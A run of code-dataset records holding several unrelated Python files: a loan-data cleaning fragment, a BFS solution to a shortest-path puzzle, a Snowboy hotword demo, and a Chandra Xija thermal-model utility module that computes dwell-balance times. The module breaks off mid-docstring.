X_test.Self_Employed.fillna(X_test['Self_Employed'].mode()[0],inplace = True)\n    X_test.Loan_Amount_Term.fillna(X_test['Loan_Amount_Term'].mode()[0],inplace = True)\n    X_test.Credit_History.fillna(X_test['Credit_History'].mode()[0],inplace = True)\n    \n    X_train.Gender.fillna(X_test['Gender'].mode()[0],inplace = True)\n    X_train.Married.fillna(X_test['Married'].mode()[0],inplace = True)\n    X_train.Dependents.fillna(X_test['Dependents'].mode()[0],inplace = True)\n    X_train.Self_Employed.fillna(X_test['Self_Employed'].mode()[0],inplace = True)\n    X_train.Loan_Amount_Term.fillna(X_test['Loan_Amount_Term'].mode()[0],inplace = True)\n    X_train.Credit_History.fillna(X_test['Credit_History'].mode()[0],inplace = True)\n    \n    return (X,y,X_train,X_test,y_train,y_test)\n    \n    \n\n\n","sub_path":"q02_data_cleaning_all/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"76480148","text":"# If the node range (0 <= node <= 10000) is not restricted, the search can wander outside the range before it returns\n# Using Queue() gave a time limit exceeded -> passed when switched to deque()\n# Checking visited with \"if in\" has to compare against every key in visited, so even a dictionary loses efficiency, although it is still better than O(N)\n# So initialize a list instead: visited = [-1]*100001\n# and checking with \"if visited[new_node] != -1\" makes the visit check an O(1) operation\n\n# from queue import Queue\nfrom collections import deque\n\ndef BFS(n, k):\n    # q = Queue()\n    dq = deque()\n    visited = [-1]*100001\n\n    # q.put(n)\n    dq.append(n)\n    visited[n] = 0\n\n    while( dq ):\n        # node = q.get()\n        node = dq.popleft()\n        if node == k:\n            print(visited[node])\n            return\n        for new_node in (node+1, node-1, node*2):\n            if new_node < 0 or new_node > 100000: continue\n            # if new_node in visited: continue\n            if visited[new_node] != -1: continue\n            # q.put(new_node)\n            dq.append(new_node)\n            visited[new_node] = visited[node]+1\n\n\n\nif __name__ == \"__main__\":\n    N, K = map(int, input().split())\n    BFS(N, K)\n\n\n# There is also this alternative approach\n# using a while loop together with a for loop\n# https://home-body.tistory.com/63","sub_path":"1697 숨바꼭질.py","file_name":"1697 숨바꼭질.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"548335173","text":"import snowboydecoder_arecord\nimport sys\nimport signal\n\n\"\"\"\nThis demo file shows you how to use the new_message_callback to interact with\nthe recorded audio after a keyword is spoken. It saves the recorded audio to a \nwav file.\n\"\"\"\n\n\ninterrupted = False\n\n\ndef signal_handler(signal, frame):\n    global interrupted\n    interrupted = True\n\ndef audioRecorderCallback(fname):\n\tprint (\"call google to STT: \" + fname)\n\ndef interrupt_callback():\n\tglobal interrupted\n\treturn interrupted\n\nif len(sys.argv) == 1:\n    print(\"Error: need to specify model name\")\n    print(\"Usage: python demo.py your.model\")\n    sys.exit(-1)\n\nmodel = sys.argv[1]\n\n# capture SIGINT signal, e.g., Ctrl+C\nsignal.signal(signal.SIGINT, signal_handler)\n\ndetector = snowboydecoder_arecord.HotwordDetector(model, sensitivity=0.5)\nprint('Listening... 
Press Ctrl+C to exit')\n\ndef audioRecorderCallback(fname):\n\tprint ('file is complete ' + fname)\n\n# main loop\ndetector.start( detected_callback=None, #snowboydecoder_arecord.play_audio_file,\n interrupt_check=interrupt_callback,\n audio_recorder_callback=audioRecorderCallback,\n sleep_time=0.01)\n\ndetector.terminate()\n","sub_path":"examples/Python/demo_arecord2.py","file_name":"demo_arecord2.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"534243016","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\nfrom hashlib import md5\nfrom json import loads as json_loads\nfrom pathlib import Path\nfrom urllib.request import urlopen\nfrom urllib.parse import urljoin\nimport json\nfrom git import Repo\nimport numpy as np # noqa\nfrom scipy import interpolate # noqa\n\nfrom cxotime import CxoTime\nimport xija\nfrom xija import get_model_spec\n\nnon_state_names = {'aacccdpt': ['aca0', ],\n 'pftank2t': ['pf0tank2t', ],\n '4rt700t': ['oba0', ],\n 'pline03t': ['pline03t0', ],\n 'pline04t': ['pline04t0', ],\n 'pm1thv2t': ['mups0', ],\n 'pm2thv1t': ['mups0', 'mups1'],\n '1deamzt': ['dea0', ],\n '1dpamzt': ['dpa0', ],\n 'fptemp_11': ['fptemp', '1cbat', 'sim_px'],\n '1pdeaat': ['pin1at', ],\n '2ceahvpt': ['cea0', 'cea1']}\n\n\ndef get_github_chandra_models_version_info():\n \"\"\" Download a list of all tags and branches, along with associated information.\n\n :return: Dictionary of all tags and branches, along with associated information.\n :rtype: dict\n \"\"\"\n with urlopen('https://api.github.com/repos/sot/chandra_models/tags') as url:\n response = url.read()\n tags = json.loads(response.decode('utf-8'))\n\n with urlopen('https://api.github.com/repos/sot/chandra_models/branches') as url:\n response = url.read()\n branches = json.loads(response.decode('utf-8'))\n\n all_versions_info = {t[\"name\"]: t for t in tags}\n all_versions_info.update({b[\"name\"]: b for b in branches})\n return all_versions_info\n\n\ndef load_github_model_specs(version='master'):\n \"\"\" Load Xija all model parameters for a specified version from https://github.com/sot/chandra_models.\n\n :param version: tag or branch to use\n :type version: str\n\n :return: A dictionary containing the model specifications for all available Xija models for the chandra_models\n version specified\n :rtype: dict\n\n Note:\n This will need to be updated as new models are approved or existing models are renamed.\n \"\"\"\n\n def join_url_parts(repository_root, url_parts):\n return urljoin(repository_root, '/'.join(url_parts).replace('///', '/').replace('//', '/'))\n\n def get_model(model_location):\n \"\"\" Load parameters for a single Xija model.\n\n :param model_location: Relative location of model file, starting from the chandra_models root repository\n location\n\n :return: JSON file stored as a dictionary, md5 hash of file\n \"\"\"\n\n repository_url = 'https://raw.githubusercontent.com/sot/chandra_models/'\n model_spec_url = join_url_parts(repository_url, [version, model_location])\n\n with urlopen(model_spec_url) as url:\n response = url.read()\n f = response.decode('utf-8')\n\n md5_hash = md5(f.encode('utf-8')).hexdigest()\n\n return json_loads(f), md5_hash\n\n model_locations = {\n 'aacccdpt': '/chandra_models/xija/aca/aca_spec.json',\n '1deamzt': '/chandra_models/xija/dea/dea_spec.json',\n '1dpamzt': '/chandra_models/xija/dpa/dpa_spec.json',\n 'fptemp': '/chandra_models/xija/acisfp/acisfp_spec_matlab.json',\n 
'1pdeaat': '/chandra_models/xija/psmc/psmc_spec.json',\n 'pftank2t': '/chandra_models/xija/pftank2t/pftank2t_spec.json',\n '4rt700t': '/chandra_models/xija/fwdblkhd/4rt700t_spec.json',\n 'pline03t': '/chandra_models/xija/pline/pline03t_model_spec.json',\n 'pline04t': '/chandra_models/xija/pline/pline04t_model_spec.json',\n 'pm1thv2t': '/chandra_models/xija/mups_valve/pm1thv2t_spec.json',\n 'pm2thv1t': '/chandra_models/xija/mups_valve/pm2thv1t_spec_matlab.json',\n '2ceahvpt': '/chandra_models/xija/hrc/cea_spec.json',\n }\n\n all_versions_info = get_github_chandra_models_version_info()\n\n model_specs = {'sha': all_versions_info[version]['commit']['sha'], 'version_info': all_versions_info[version],\n 'version': version}\n\n for msid, path in model_locations.items():\n model_specs[msid], model_specs[msid + '_md5'] = get_model(path)\n model_specs['fptemp_11'] = model_specs['fptemp'] # For backwards compatibility\n model_specs['fptemp_11_md5'] = model_specs['fptemp_md5'] # For backwards compatibility\n\n return model_specs\n\n\ndef load_model_specs(version=None, local_repository_location=None):\n \"\"\" Load Xija model parameters for all available models.\n\n :param version: tag or branch to use\n :type version: str\n :param local_repository_location: location of chandra_models repository, defaults to `get_model_spec.REPO_PATH`\n :type local_repository_location: str\n\n :return: A dictionary containing the model specifications for all available Xija models, along with latest commit\n sha for version specified (or existing branch/tag), branch/tag, and repository state\n :rtype: dict\n\n Note:\n This will need to be updated as new models are approved or existing models are renamed.\n \"\"\"\n\n def get_local_git_version_info(repo):\n \"\"\" Get latest git commit hash for current branch.\n\n :param repo: gitpython Repo object for repository\n :type repo: git.repo.base.Repo\n :return: Latest commit hash, branch/tag, repository state\n :return: dict\n \"\"\"\n\n hexsha, version = repo.commit().name_rev.split()\n modified = repo.is_dirty()\n return {'sha': hexsha, 'version': version, 'modified': modified}\n\n def get_model(model_location):\n \"\"\" Load parameters for a single Xija model.\n\n :param model_location: Relative location of model file, starting from the chandra_models root repository\n location\n :type model_location: str\n\n :return: JSON file stored as a dictionary, md5 hash of file\n :rtype: tuple\n \"\"\"\n\n with open(Path.joinpath(local_repository_location, Path(model_location))) as fid:\n f = fid.read()\n md5_hash = md5(f.encode('utf-8')).hexdigest()\n return json_loads(f), md5_hash\n\n model_locations = {\n 'aacccdpt': 'chandra_models/xija/aca/aca_spec.json',\n '1deamzt': 'chandra_models/xija/dea/dea_spec.json',\n '1dpamzt': 'chandra_models/xija/dpa/dpa_spec.json',\n 'fptemp': 'chandra_models/xija/acisfp/acisfp_spec_matlab.json',\n '1pdeaat': 'chandra_models/xija/psmc/psmc_spec.json',\n 'pftank2t': 'chandra_models/xija/pftank2t/pftank2t_spec.json',\n '4rt700t': 'chandra_models/xija/fwdblkhd/4rt700t_spec.json',\n 'pline03t': 'chandra_models/xija/pline/pline03t_model_spec.json',\n 'pline04t': 'chandra_models/xija/pline/pline04t_model_spec.json',\n 'pm1thv2t': 'chandra_models/xija/mups_valve/pm1thv2t_spec.json',\n 'pm2thv1t': 'chandra_models/xija/mups_valve/pm2thv1t_spec_matlab.json',\n '2ceahvpt': 'chandra_models/xija/hrc/cea_spec.json',\n }\n\n if local_repository_location is None:\n local_repository_location = get_model_spec.REPO_PATH\n else:\n local_repository_location = 
Path(local_repository_location).expanduser()\n\n with get_model_spec.temp_directory() as repo_path_local:\n repo = Repo.clone_from(local_repository_location, repo_path_local)\n if version is not None:\n _ = repo.git.checkout(version)\n model_specs = get_local_git_version_info(repo)\n\n for msid, path in model_locations.items():\n model_specs[msid], model_specs[msid + '_md5'] = get_model(path)\n model_specs['fptemp_11'] = model_specs['fptemp'] # For backwards compatibility\n model_specs['fptemp_11_md5'] = model_specs['fptemp_md5'] # For backwards compatibility\n\n return model_specs\n\n\ndef get_local_model(filename):\n \"\"\" Load parameters for a single Xija model.\n\n :param filename: File path to local model specification file\n :type filename: str\n :return: Model spec as a dictionary, md5 hash of model spec\n :rtype: tuple\n \"\"\"\n\n with open(filename) as fid: # 'aca/aca_spec.json', 'rb') as fid:\n f = fid.read()\n\n return json.loads(f), md5(f.encode('utf-8')).hexdigest()\n\n\ndef c_to_f(temp):\n \"\"\" Convert Celsius to Fahrenheit.\n\n :param temp: Temperature in Celsius\n :type temp: int or float or tuple or list or np.ndarray\n :return: Temperature in Fahrenheit\n :rtype: int or float or list or np.ndarray\n \"\"\"\n if type(temp) is list or type(temp) is tuple:\n return [c * 1.8 + 32 for c in temp]\n else:\n return temp * 1.8 + 32.0\n\n\ndef f_to_c(temp):\n \"\"\" Convert Fahrenheit to Celsius.\n\n :param temp: Temperature in Fahrenheit\n :type temp: int or float or tuple or list or np.ndarray\n :return: Temperature in Celsius\n :rtype: int or float or list or np.ndarray\n \"\"\"\n if type(temp) is list or type(temp) is tuple:\n return [(c - 32) / 1.8 for c in temp]\n else:\n return (temp - 32.0) / 1.8\n\n\ndef setup_model(msid, t0, t1, model_spec, init):\n \"\"\" Create Xija model object\n\n This function creates a Xija model object with initial parameters, if any. This function is intended to create a\n streamlined method to creating Xija models that can take both single value data and time defined data\n (e.g. 
[pitch1, pitch2, pitch3], [time1, time2, time3]), defined in the `init` dictionary.\n\n :param msid: Primary MSID for model; in this case it can be anything as it is only being used to name the model,\n however keeping the convention to name the model after the primary MSID being predicted reduces confusion\n :type msid: str\n :param t0: Start time for model prediction; this can be any format that cxotime.CxoTime accepts\n :type t0: str or float or int\n :param t1: End time for model prediction; this can be any format that cxotime.CxoTime accepts\n :type t1: str or float or int\n :param model_spec: Dictionary of model parameters or file location where parameters can be imported\n :type model_spec: dict, str\n :param init: Dictionary of Xija model initialization parameters, can be empty\n :type init: dict\n :rtype: xija.model.XijaModel\n\n Example::\n\n model_specs = load_model_specs()\n init = {'1dpamzt': 35., 'dpa0': 35., 'eclipse': False, 'roll': 0, 'vid_board': True, 'pitch':155,\n 'clocking': True, 'fep_count': 5, 'ccd_count': 5, 'sim_z': 100000}\n model = setup_model('1dpamzt', '2019:001:00:00:00', '2019:010:00:00:00', model_specs['1dpamzt'], init)\n\n Notes:\n\n - This does not run the model, only sets up the model to be run.\n - Any parameters not specified in `init` will either need to be pulled from telemetry or explicitly defined \\\n outside of this function before running the model.\n\n \"\"\"\n\n model = xija.ThermalModel(msid, start=t0, stop=t1, model_spec=model_spec)\n for key, value in init.items():\n if isinstance(value, dict):\n model.comp[key].set_data(value['data'], value['times'])\n else:\n model.comp[key].set_data(value)\n\n return model\n\n\ndef run_profile(times, schedule, msid, model_spec, init, pseudo=None):\n \"\"\" Run a Xija model for a given time and state profile.\n\n :param times: Array of time values, in seconds from '1997:365:23:58:56.816' (cxotime.CxoTime epoch)\n :type times: np.ndarray\n :param schedule: Dictionary of pitch, roll, etc. values that match the time values specified above in `times`\n :type schedule: dict\n :param msid: Primary MSID for model being run\n :type msid: str\n :param model_spec: Dictionary of model parameters or file location where parameters can be imported\n :type model_spec: dict or string\n :param init: Dictionary of Xija model initialization parameters, can be empty but not recommended\n :type init: dict\n :param pseudo: Name of one or more pseudo MSIDs used in the model, if any, only necessary if one\n wishes to retrieve model results for this pseudo node, if it exists\n :type pseudo: str or None, optional\n :returns: Results, keys are node names (e.g. 
'aacccdpt', 'aca0'), values are Xija model component objects\n :rtype: dict\n\n Example::\n\n times = np.array(CxoTime(['2019:001:00:00:00', '2019:001:12:00:00', '2019:002:00:00:00',\n '2019:003:00:00:00']).secs)\n pitch = np.array([150, 90, 156, 156])\n schedule = {'pitch': pitch}\n model_specs = load_model_specs()\n init = {'1dpamzt': 20., 'dpa0': 20., 'eclipse': False, 'roll': 0, 'vid_board': True, 'clocking': True,\n 'fep_count': 5, 'ccd_count': 5, 'sim_z': 100000}\n results = run_profile(times, pitch, '1dpamzt', model_specs['1dpamzt'], init, pseudo='dpa0')\n\n Note:\n\n Any parameters specified in `init` will be overwritten by those specified in the body of this function, if they\n happen to be defined in both places.\n \"\"\"\n\n model = setup_model(msid, times[0], times[-1], model_spec, init)\n\n for key, value in schedule.items():\n model.comp[key].set_data(value, times=times)\n\n model.make()\n model.calc()\n tmsid = model.get_comp(msid)\n results = {msid: tmsid}\n\n if pseudo is not None:\n results[pseudo] = model.get_comp(pseudo)\n\n return results\n\n\ndef calc_binary_schedule(datesecs, state1, state2, t_dwell1, t_dwell2, msid, model_spec, init, duration=2592000.,\n t_backoff=1725000., pseudo=None):\n \"\"\" Simulate a schedule that switches between two states\n\n This runs the model over a \"binary\" schedule. This function is intended to be used to optimize the `t_dwell2`\n parameter so that the predicted temperature during the last `t_backoff` number of seconds reaches a limit within a\n tolerance (limit used and specified in a different function).\n\n :param datesecs: Date for start of simulation, in seconds from '1997:365:23:58:56.816' (cxotime.CxoTime epoch)\n :type datesecs: float or int\n :param state1: States for fixed dwell (pitch, roll, ccds, etc.)\n :type state1: dict\n :param state2: States for variable dwell (pitch, roll, ccds, etc.)\n :type state2: dict\n :param t_dwell1: Fixed dwell duration in seconds\n :type t_dwell1: float or int\n :param t_dwell2: Variable dwell duration in seconds (this is the parameter that is optimized)\n :type t_dwell2: float or int\n :param msid: Primary MSID for model being run\n :type msid: str\n :param model_spec: Dictionary of model parameters or file location where parameters can be imported\n :type model_spec: dict, string\n :param init: Dictionary of Xija model initialization parameters\n :type init: dict\n :param duration: Duration for entire simulated schedule, defaults to 30 days (in seconds)\n :type duration: float, optional\n :param t_backoff: Duration for tail end of simulated schedule used to determine convergence, defaults to 10 days\n (in seconds)\n :type t_backoff: float, optional\n :param pseudo: Name of one or more pseudo MSIDs used in the model, if any, only necessary if one wishes to retrieve\n model results for this pseudo node, if it exists. This currently is not used but kept here as a placeholder.\n :type pseudo: str, optional\n :returns:\n - **results** (:py:class:`dict`) - keys are node names (e.g. 
'aacccdpt', 'aca0'), values are Xija model\n component objects, this is the same object returned by `run_profile`\n - **times** (:py:class:`np.ndarray`) - time values input into Xija (may not exactly match Xija output)\n - **state_keys** (:py:class:`np.ndarray`) - defines state order, with elements matching the time array output\n (may not exactly match Xija output), this defines where to insert what state\n :rtype: tuple\n\n Notes:\n\n - Keys in state1 must match keys in state2.\n - Keys in state1 must match Xija component names (e.g. 'pitch', 'ccd_count', 'sim_z')\n \"\"\"\n\n num = int(duration / (t_dwell1 + t_dwell2))\n reltimes = np.cumsum([1, t_dwell1 - 1, 1, t_dwell2 - 1] * num)\n times = np.array(reltimes) - reltimes[0] + datesecs - t_backoff\n\n schedule = dict(zip(state1.keys(), []))\n for key, value in state1.items():\n layout = [state1[key], state1[key], state2[key], state2[key]] * num\n schedule[key] = np.array(layout)\n\n state_keys = [1, 1, 2, 2] * num\n state_keys = np.array(state_keys)\n\n model_results = run_profile(times, schedule, msid, model_spec, init, pseudo=pseudo)\n\n return model_results, times, state_keys\n\n\ndef create_opt_fun(datesecs, dwell1_state, dwell2_state, t_dwell1, msid, model_spec, init, t_backoff, duration):\n \"\"\" Generate a Xija model function with preset values, for use with an optimization routine.\n\n :param datesecs: Date for start of simulation, in seconds from '1997:365:23:58:56.816' (cxotime.CxoTime epoch)\n :type datesecs: float or int\n :param dwell1_state: States for fixed dwell (pitch, roll, ccds, etc.)\n :type dwell1_state: dict\n :param dwell2_state: States for variable dwell (pitch, roll, ccds, etc.)\n :type dwell2_state: dict\n :param t_dwell1: Fixed dwell duration in seconds\n :type t_dwell1: float or int\n :param msid: Primary MSID for model being run\n :type msid: str\n :param model_spec: Dictionary of model parameters or file location where parameters can be imported\n :type model_spec: dict, string\n :param init: Dictionary of Xija model initialization parameters\n :type init: dict\n :param t_backoff: Duration for tail end of simulated schedule used to determine convergence, defaults to 10 days\n (in seconds)\n :type t_backoff: float, optional\n :param duration: Duration for entire simulated schedule, defaults to 30 days (in seconds)\n :type duration: float, optional\n :returns: Function generated from specified parameters, to be passed to optimization routine\n :rtype: function\n\n Notes:\n\n - Keys in state1 must match keys in state2.\n - Keys in state1 must match Xija component names (e.g. 
'pitch', 'ccd_count', 'sim_z')\n \"\"\"\n\n def opt_binary_schedule(t):\n model_results, _, _ = calc_binary_schedule(datesecs, dwell1_state, dwell2_state, t_dwell1, t, msid,\n model_spec, init, duration=duration, t_backoff=t_backoff)\n\n model_temps = model_results[msid].mvals\n model_times = model_results[msid].times\n ind = model_times > (model_times[-1] - t_backoff)\n dmax = np.max(model_temps[ind])\n dmin = np.min(model_temps[ind])\n dmean = np.mean(model_temps[ind])\n\n return t, dmax, dmean, dmin\n\n return opt_binary_schedule\n\n\ndef find_second_dwell(date, dwell1_state, dwell2_state, t_dwell1, msid, limit, model_spec, init, limit_type='max',\n duration=2592000, t_backoff=1725000, n_dwells=10, min_dwell=None, max_dwell=None, pseudo=None):\n \"\"\" Determine the required dwell time at pitch2 to balance a given fixed dwell time at pitch1, if any exists.\n\n :param date: Date for start of simulation, in seconds from '1997:365:23:58:56.816' (cxotime.CxoTime epoch) or any\n other format readable by cxotime.CxoTime\n :type date: float or int or str\n :param dwell1_state: States for fixed dwell (pitch, roll, ccds, etc.)\n :type dwell1_state: dict\n :param dwell2_state: States for variable dwell (pitch, roll, ccds, etc.)\n :type dwell2_state: dict\n :param t_dwell1: Fixed dwell duration in seconds\n :type t_dwell1: float or int\n :param msid: Primary MSID for model being run\n :type msid: str\n :param limit: Temperature limit for primary MSID in model for this simulation\n :type limit: float\n :param model_spec: Dictionary of model parameters or file location where parameters can be imported\n :type model_spec: dict, string\n :param init: Dictionary of Xija model initialization parameters\n :type init: dict\n :param limit_type: Type of limit, defaults to 'max' (a maximum temperature limit), other option is 'min'\n :type limit_type: str, optional\n :param duration: Duration for entire simulated schedule, defaults to 30 days (in seconds)\n :type duration: float, optional\n :param t_backoff: Duration for tail end of simulated schedule used to determine convergence, defaults to 10 days\n (in seconds)\n :type t_backoff: float, optional\n :param n_dwells: Number of second dwell, `t_dwell2`, possibilities to run (more dwells = finer resolution)\n :type n_dwells: int, optional\n :param min_dwell: Minimum duration for second dwell, can be used if the user wants to narrow the dwell time search,\n defaults to 1.0e-6s\n :type min_dwell: float, optional\n :param max_dwell: Maximum duration for second dwell, can be used if the user wants to narrow the dwell time search\n :type max_dwell: float, optional\n :param pseudo: Name of one or more pseudo MSIDs used in the model, if any, only necessary if one wishes to retrieve\n model results for this pseudo node, if it exists. 
This currently is not used but kept here as a placeholder.\n :type pseudo: str, optional\n :returns: Dictionary of results information\n :rtype: dict\n \"\"\"\n\n datesecs = CxoTime(date).secs\n msid = msid.lower()\n\n if 'max' in limit_type.lower():\n limit_type = 'max'\n else:\n limit_type = 'min'\n\n if max_dwell is None:\n # This ensures three \"cycles\" of the two dwell states, within the portion of the schedule used for evaluation\n # (t_backoff).\n # Subtract 1000 sec for extra padding.\n max_dwell = (t_backoff - t_dwell1) / 3 - 1000\n\n if min_dwell is None:\n min_dwell = 1.0e-6\n\n results = {'converged': False, 'unconverged_hot': False, 'unconverged_cold': False,\n 'min_temp': np.nan, 'mean_temp': np.nan, 'max_temp': np.nan, 'temperature_limit': limit,\n 'dwell_2_time': np.nan, 'min_pseudo': np.nan, 'mean_pseudo': np.nan, 'max_pseudo': np.nan,\n 'hotter_state': np.nan, 'colder_state': np.nan}\n\n # Ensure t_dwell1 is a float, may not be necessary anymore\n t_dwell1 = float(t_dwell1)\n\n opt_fun = create_opt_fun(datesecs, dwell1_state, dwell2_state, t_dwell1, msid, model_spec, init, t_backoff,\n duration)\n\n # First just check the bounds to avoid unnecessary runs of `opt_fun`\n output = np.array([opt_fun(t) for t in [min_dwell, max_dwell]],\n dtype=[('duration2', float), ('max', float), ('mean', float), ('min', float)])\n\n if 'max' in limit_type:\n\n # All cases report temperatures entirely below the limit.\n if np.all(output['max'] < limit):\n results = _handle_unconverged_cold(output, results)\n\n # All cases report temperatures entirely above the limit.\n elif np.all(output['max'] > limit):\n results = _handle_unconverged_hot(output, results)\n\n # Temperatures straddle the limit, so a refined dwell 2 time is possible.\n else:\n results, output = _refine_dwell2_time('max', n_dwells, min_dwell, max_dwell, limit, opt_fun, results)\n\n elif 'min' in limit_type:\n\n # All cases report temperatures entirely below the limit.\n if np.all(output['min'] < limit):\n results = _handle_unconverged_cold(output, results)\n\n # All cases report temperatures entirely above the limit.\n elif np.all(output['min'] > limit):\n results = _handle_unconverged_hot(output, results)\n\n # Temperatures straddle the limit, so a refined dwell 2 time is possible.\n else:\n results, output = _refine_dwell2_time('min', n_dwells, min_dwell, max_dwell, limit, opt_fun, results)\n\n if output['max'][0] > output['max'][-1]:\n results['hotter_state'] = 1\n results['colder_state'] = 2\n else:\n results['hotter_state'] = 2\n results['colder_state'] = 1\n\n return results\n\n\ndef _handle_unconverged_hot(output, results):\n \"\"\" Record useful information for the case where all output remains above the limit.\n\n This is intended to be run solely by find_second_dwell(). This modifies the `results` dictionary inherited from the\n parent function to provide information about the case that came the closest to converging.\n\n :param output: Numpy array of maximum, mean, and minimum temperatures for each simulation generated, within the last\n `t_backoff` duration (e.g. 
the last two thirds of `duration`) for the final refinement step.\n :type output: np.ndarray\n :param results: Results dictionary initialized in parent function\n :type results: dict\n :returns: Dictionary of results information\n :rtype: dict\n \"\"\"\n\n # You want the data for the case that is closest to the limit, in this case that is the data with the min value.\n ind = np.argmin(output['min'])\n results['unconverged_hot'] = True\n results['dwell_2_time'] = np.nan\n results['max_temp'] = output['max'][ind]\n results['min_temp'] = output['min'][ind]\n results['mean_temp'] = output['mean'][ind]\n results['converged'] = False\n\n return results\n\n\ndef _handle_unconverged_cold(output, results):\n \"\"\" Record useful information for the case where all output remains below the limit.\n\n This is intended to be run solely by find_second_dwell(). This modifies the `results` dictionary inherited from the\n parent function to provide information about the case that came the closest to converging.\n\n :param output: Numpy array of maximum, mean, and minimum temperatures for each simulation generated, within the last\n `t_backoff` duration (e.g. the last two thirds of `duration`) for the final refinement step.\n :type output: np.ndarray\n :param results: Results dictionary initialized in parent function\n :type results: dict\n :returns: Dictionary of results information\n :rtype: dict\n \"\"\"\n\n # You want the data for the case that is closest to the limit, in this case that is the data with the max value.\n ind = np.argmax(output['max'])\n results['unconverged_cold'] = True\n results['dwell_2_time'] = np.nan\n results['max_temp'] = output['max'][ind]\n results['min_temp'] = output['min'][ind]\n results['mean_temp'] = output['mean'][ind]\n results['converged'] = False\n\n return results\n\n\ndef _refine_dwell2_time(limit_type, n_dwells, min_dwell, max_dwell, limit, opt_fun, results):\n \"\"\" Refine the required dwell time at pitch2 to balance a given fixed dwell time at pitch1.\n\n This is intended to be run solely by find_second_dwell() to refine the amount of dwell 2 time is necessary to\n balance the dwell 1 time. This modifies the `results` dictionary inherited from the parent function, but also\n returns the `output` ndarray containing data from the final refinement operation.\n\n :param limit_type: Type of limit, either a minimum or maximum temperature limit (needs to have 'min' or 'max' in\n string passed to this argument\n :type limit_type: str\n :param n_dwells: Number of second dwell possibilities to run (more dwells = finer resolution)\n :type n_dwells: int\n :param min_dwell: Minimum duration for second dwell, can be used if the user wants to narrow the dwell time search,\n defaults to 1.0e-6s\n :type min_dwell: float\n :param max_dwell: Maximum duration for second dwell, can be used if the user wants to narrow the dwell time search\n :type max_dwell: float\n :param limit: Limit in Celsius for current simulation\n :type limit: float\n :param opt_fun: Function that runs the schedule defined by dwell1_state and dwell2_state\n :type opt_fun: function\n :param results: Results dictionary initialized in parent function\n :type results: dict\n :returns:\n - results (:py:class:`dict`) - Dictionary of results information\n - times (:py:class:`np.ndarray`) - Numpy array of maximum, mean, and minimum temperatures for each simulation\n generated, within the last`t_backoff` duration (e.g. 
the last two thirds of `duration`) for the final\n refinement step.\n \"\"\"\n\n # This is the configuration for working with a max temperature limit (as opposed to a min temperature limit).\n max_min = 'max'\n min_max = 'min'\n\n if 'min' in limit_type:\n max_min = 'min'\n min_max = 'max'\n\n # dwell2_range defines the possible dwell 2 guesses, first defined in log space\n dwell2_range = np.logspace(1.0e-6, 1, n_dwells, endpoint=True) / n_dwells\n dwell2_range = min_dwell + \\\n (max_dwell - min_dwell) * (dwell2_range - dwell2_range[0]) / (dwell2_range[-1] - dwell2_range[0])\n\n # Run the dwell1_state-dwell2_state schedule using the possible dwell 2 guesses\n output = np.array([opt_fun(t) for t in dwell2_range], dtype=[('duration2', float), ('max', float),\n ('mean', float), ('min', float)])\n\n # Ensure the results are sorted. Although dwell2_range will be sorted, the output may not when two or more dwell\n # times are close, where temperature oscillations from instabilities in the Xija model can cause the results to lose\n # this order.\n #\n # The column that is used to sort the results also depends on the limit type.\n output_sorted = np.sort(output, order=max_min)\n ind = np.searchsorted(output_sorted[max_min], limit)\n\n if ind == 0:\n # np.searchsorted finds the first suitable location by default, so if ind == 0, then the duration must\n # fall at the bounded value. This is not true if ind == -1 (the last value).\n results[max_min + '_temp'] = limit\n results['dwell_2_time'] = output['duration2'][ind]\n results[min_max + '_temp'] = output[min_max][ind]\n results['mean_temp'] = output['mean'][ind]\n results['converged'] = True\n\n else:\n t_bound = (output_sorted['duration2'][ind - 1], output_sorted['duration2'][ind])\n dwell2_range = np.linspace(np.min(t_bound), np.max(t_bound), n_dwells, endpoint=True)\n output = np.array([opt_fun(t) for t in dwell2_range],\n dtype=[('duration2', float), ('max', float), ('mean', float),\n ('min', float)])\n\n # In rare conditions where all 'x' values are very close and 'wobble' a bit, it may not be sorted. If it\n # is not sorted, the quadratic method will result in an error. The linear method is more tolerant of this\n # condition. 
Additionally, the quadratic has a tendency to produce some really weird results even when the\n # data appears sensible.\n f_dwell_2_time = interpolate.interp1d(output[max_min], output['duration2'], kind='linear', assume_sorted=False)\n f_non_limit_temp = interpolate.interp1d(output[max_min], output[min_max], kind='linear', assume_sorted=False)\n f_mean_temp = interpolate.interp1d(output[max_min], output['mean'], kind='linear', assume_sorted=False)\n\n results[max_min + '_temp'] = limit\n results['dwell_2_time'] = f_dwell_2_time(limit).item()\n results['mean_temp'] = f_mean_temp(limit).item()\n results[min_max + '_temp'] = f_non_limit_temp(limit).item()\n\n results['converged'] = True\n\n return results, output\n\n\ndef run_state_pairs(msid, model_spec, init, limit, date, dwell_1_duration, state_pairs, limit_type='max',\n min_dwell=None, max_dwell=None, n_dwells=10, print_progress=True, shared_data=None):\n \"\"\" Determine dwell balance times for a set of cases.\n\n :param msid: Primary MSID for model being run\n :type msid: str\n :param model_spec: Dictionary of model parameters or file location where parameters can be imported\n :type model_spec: dict, string\n :param init: Dictionary of Xija model initialization parameters\n :type init: dict\n :param limit: Temperature limit for primary MSID in model for this simulation\n :type limit: float\n :param date: Date for start of simulation, in seconds from '1997:365:23:58:56.816' (cxotime.CxoTime epoch) or any\n other format readable by cxotime.CxoTime\n :type date: float or int or str\n :param dwell_1_duration: Duration in seconds of dwell 1, also viewed as the known or defined dwell duration, for\n which one wants to find a complementary dwell duration (dwell duration 2)\n :type dwell_1_duration: float or int\n :param state_pairs: Iterable of dictionary pairs, where each pair of dictionaries contain dwell1 and dwell2 states,\n see state_pair section below for further details\n :type state_pairs: list or tuple\n :param limit_type: Type of limit, defaults to 'max' (a maximum temperature limit), other option is 'min'\n :type limit_type: str, optional\n :param min_dwell: Minimum duration for second dwell, can be used if the user wants to narrow the dwell time search,\n defaults to 1.0e-6s\n :type min_dwell: float\n :param max_dwell: Maximum duration for second dwell, can be used if the user wants to narrow the dwell time search\n :type max_dwell: float\n :param n_dwells: Number of second dwell, `t_dwell2`, possibilities to run (more dwells = finer resolution)\n :type n_dwells: int, optional\n :param shared_data: Shared list of results, used when running multiple 